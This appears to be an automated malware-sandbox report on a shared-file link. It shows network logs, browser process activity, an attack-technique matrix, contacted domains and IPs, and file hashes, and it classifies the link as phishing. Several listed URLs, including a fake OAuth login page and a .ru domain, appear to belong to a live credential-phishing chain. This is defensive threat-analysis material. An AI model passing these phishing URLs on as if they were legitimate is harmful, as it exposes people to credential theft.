      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
      Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
      Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
      Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
      Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
      Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
      Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49862 version: TLS 1.2
      Source: classification engineClassification label: mal52.phis.win@23/106@78/268
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=1936,i,17948422447379762883,7660547888404076553,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=1936,i,17948422447379762883,7660547888404076553,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      Browser Extensions
      1
      Process Injection
      3
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Registry Run Keys / Startup Folder
      1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://cavotec-au.sharefile.com/public/share/web-1271a93971714a910%Avira URL Cloudsafe
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      fastly-tls12-bam.nr-data.net
      162.247.243.29
      truefalse
        high
        0093b71e39a6.us-east-1.sdk.awswaf.com
        18.165.220.77
        truefalse
          high
          cavotec-au.sf-api.com
          13.248.193.251
          truefalse
            unknown
            js-agent.newrelic.com
            162.247.243.39
            truefalse
              high
              events.launchdarkly.com
              34.233.215.113
              truefalse
                high
                s-part-0035.t-0009.t-msedge.net
                13.107.246.63
                truefalse
                  high
                  sf-cv.sharefile.com
                  13.248.193.251
                  truefalse
                    high
                    piletfeed-cdn.sharefile.io
                    216.137.52.33
                    truefalse
                      high
                      0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                      108.158.75.28
                      truefalse
                        high
                        wac-0003.wac-msedge.net
                        52.108.8.12
                        truefalse
                          unknown
                          s7ol.lomifor.ru
                          104.21.33.6
                          truefalse
                            unknown
                            51.138.111.34.bc.googleusercontent.com
                            34.111.138.51
                            truefalse
                              high
                              code.jquery.com
                              151.101.66.137
                              truefalse
                                high
                                o49063.ingest.sentry.io
                                34.120.195.249
                                truefalse
                                  high
                                  cdnjs.cloudflare.com
                                  104.17.25.14
                                  truefalse
                                    high
                                    cavotec-au.sharefile.com
                                    13.248.193.251
                                    truefalse
                                      unknown
                                      challenges.cloudflare.com
                                      104.18.94.41
                                      truefalse
                                        high
                                        victoryacademytc.com
                                        192.185.150.180
                                        truefalse
                                          unknown
                                          www.google.com
                                          142.250.181.68
                                          truefalse
                                            high
                                            api.ipify.org
                                            172.67.74.152
                                            truefalse
                                              high
                                              85.204.107.34.bc.googleusercontent.com
                                              34.107.204.85
                                              truefalse
                                                unknown
                                                app.launchdarkly.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  citrix-sharefile-content.customer.pendo.io
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    bam.nr-data.net
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      wordonline.nel.measure.office.net
                                                      unknown
                                                      unknownfalse
                                                        unknown
                                                        citrix-sharefile-data.customer.pendo.io
                                                        unknown
                                                        unknownfalse
                                                          unknown
                                                          amcdn.msftauth.net
                                                          unknown
                                                          unknownfalse
                                                            unknown
                                                            NameMaliciousAntivirus DetectionReputation
                                                            https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91false
                                                              unknown
                                                              https://victoryacademytc.com/common_oauth2_v20_authorizeclientid_4765445b32c649b0/aspx.htmfalse
                                                                unknown
                                                                https://s7ol.lomifor.ru/oONm9/#Tasdfasdfa@wp.plfalse
                                                                  unknown
                                                                  https://cavotec-au.sharefile.com/share/view/1271a93971714a91true
                                                                    unknown
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    108.158.75.28
                                                                    0093b71e39a6.11de9b12.us-east-1.token.awswaf.comUnited States
                                                                    16509AMAZON-02USfalse
                                                                    104.18.94.41
                                                                    challenges.cloudflare.comUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    151.101.130.217
                                                                    unknownUnited States
                                                                    54113FASTLYUSfalse
                                                                    51.11.192.49
                                                                    unknownUnited Kingdom
                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                    104.126.36.32
                                                                    unknownUnited States
                                                                    20940AKAMAI-ASN1EUfalse
                                                                    52.108.9.12
                                                                    unknownUnited States
                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                    13.248.193.251
                                                                    cavotec-au.sf-api.comUnited States
                                                                    16509AMAZON-02USfalse
                                                                    216.137.52.33
                                                                    piletfeed-cdn.sharefile.ioUnited States
                                                                    8014BATELNETBSfalse
                                                                    151.101.66.137
                                                                    code.jquery.comUnited States
                                                                    54113FASTLYUSfalse
                                                                    142.250.181.68
                                                                    www.google.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    172.217.21.35
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    64.233.162.84
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    162.247.243.39
                                                                    js-agent.newrelic.comUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    172.217.17.42
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    34.233.215.113
                                                                    events.launchdarkly.comUnited States
                                                                    14618AMAZON-AESUSfalse
                                                                    52.113.194.132
                                                                    unknownUnited States
                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                    34.107.204.85
                                                                    85.204.107.34.bc.googleusercontent.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    172.217.19.238
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    104.26.12.205
                                                                    unknownUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    104.21.33.6
                                                                    s7ol.lomifor.ruUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    172.217.17.35
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    23.32.238.227
                                                                    unknownUnited States
                                                                    2828XO-AS15USfalse
                                                                    52.108.8.12
                                                                    wac-0003.wac-msedge.netUnited States
                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                    52.108.186.5
                                                                    unknownUnited States
                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                    18.165.220.77
                                                                    0093b71e39a6.us-east-1.sdk.awswaf.comUnited States
                                                                    3MIT-GATEWAYSUSfalse
                                                                    216.58.208.234
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    34.111.138.51
                                                                    51.138.111.34.bc.googleusercontent.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    142.250.181.106
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    239.255.255.250
                                                                    unknownReserved
                                                                    unknownunknownfalse
                                                                    162.247.243.29
                                                                    fastly-tls12-bam.nr-data.netUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    192.185.150.180
                                                                    victoryacademytc.comUnited States
                                                                    46606UNIFIEDLAYER-AS-1USfalse
                                                                    216.137.52.123
                                                                    unknownUnited States
                                                                    8014BATELNETBSfalse
                                                                    76.223.1.166
                                                                    unknownUnited States
                                                                    16509AMAZON-02USfalse
                                                                    34.120.195.249
                                                                    o49063.ingest.sentry.ioUnited States
                                                                    15169GOOGLEUSfalse
                                                                    104.17.25.14
                                                                    cdnjs.cloudflare.comUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    172.67.74.152
                                                                    api.ipify.orgUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    IP
                                                                    192.168.2.16
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1575750
                                                                    Start date and time:2024-12-16 09:45:54 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                    Sample URL:https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:13
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • EGA enabled
                                                                    Analysis Mode:stream
                                                                    Analysis stop reason:Timeout
                                                                    Detection:MAL
                                                                    Classification:mal52.phis.win@23/106@78/268
                                                                    • Exclude process from analysis (whitelisted): svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.19.238, 64.233.162.84, 172.217.17.46
                                                                    • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • VT rate limit hit for: 85.204.107.34.bc.googleusercontent.com
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 07:46:21 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2673
                                                                    Entropy (8bit):3.9890880955203984
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:29F82B7BD8D44187B4AED3E6D939F1FF
                                                                    SHA1:CDA821DB50DB23B79050CE7890BC8E576034C5AE
                                                                    SHA-256:9FEEF97FB27E03262FC96AEAFFDDD0EAE6D402E2F7E7DA2DCD5145AC0A9D3881
                                                                    SHA-512:A1E9430488B845079630A59E4172645E6A61D1AFD932388520AF0883D4E7EEB80AEE379F174BDB25758CFCE670262EC8DB278CF292735769B8052BE31BA07CE3
                                                                    Malicious:false
                                                                    Reputation:unknown
